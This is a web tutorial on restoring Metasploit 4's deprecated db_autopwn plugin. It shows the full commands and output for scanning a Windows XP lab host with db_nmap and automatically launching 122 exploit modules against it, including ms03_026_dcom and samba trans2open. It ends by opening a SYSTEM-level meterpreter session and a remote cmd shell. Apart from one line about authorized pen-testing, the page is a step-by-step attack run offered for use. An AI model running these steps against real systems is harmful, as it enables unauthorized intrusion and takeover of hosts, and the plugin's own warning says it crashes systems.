<tutorialjinni.com/>

How to Autopwn in Metasploit 4

db_autopwn was deprecated from Metasploit framework. In this tutorial we will get db_autopwn back to life. We need a Linux box with Metasploit installed. We are using Parrot Security OS with Metasploit 4.13. There are many arguments in favor and against db_autopwn but we are not going into that. I think for an authorized pen-test db_autopwn gives a quick overview, but opinions may differ.

To start we need to download db_autopwn.rb from here and save the file. Copy this file to plugins directory of metasploit, for me it is
$ /usr/share/metasploit-framework/plugins
Now open the terminal and follow the flowing commands
$ sudo service postgresql start
$ sudo msfdb init # it has to be done only once 
$ sudo msfconsole
After metasploit is loaded
msf > db_nmap -sS -O YOUR_TARGET_IP

[*] Nmap: Starting Nmap 7.30 ( https://nmap.org ) at 2016-12-02 04:57 EST
[*] Nmap: Nmap scan report for 192.168.137.24
[*] Nmap: Host is up (0.0013s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 135/tcp  open  msrpc
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 2869/tcp open  icslap
[*] Nmap: MAC Address: 00:0C:29:A2:FA:1E (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.19 seconds

msf > load db_autopwn 
[*] Successfully loaded plugin: db_autopwn
msf > db_autopwn -p -e -q
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-] 
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-]          This code is not well maintained, crashes systems, and crashes itself.
[-]          Use only if you understand it's current limitations/issues.
[-]          Minimal support and development via neinwechter on GitHub metasploit fork.
[-] 
[*] (1/122 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.137.24:135...
[*] (2/122 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.137.24:139...
[*] (3/122 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.137.24:139...

................................
................................
................................

[*] (122/122 [1 sessions]): Waiting on 0 launched modules to finish execution...
msf > 
After completing execution of all the launched exploits you can view the active sessions using
msf > sessions -l

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITYSYSTEM @ DEVIL-52F89F74B  192.168.137.181:37897 -> 192.168.137.123:38328 (192.168.137.123)
to get into an active session use
msf > sessions -i 1
[*] Starting interaction with 1...
it give us the meterpreter, type shell or execute -f cmd.exe -i -H it will give the shell of the remote host.
meterpreter > shell
Process 1356 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
After we have the shell/access we can start post-exploitation phase.

metasploit 4 db_autopwn
© Tutorial Jinni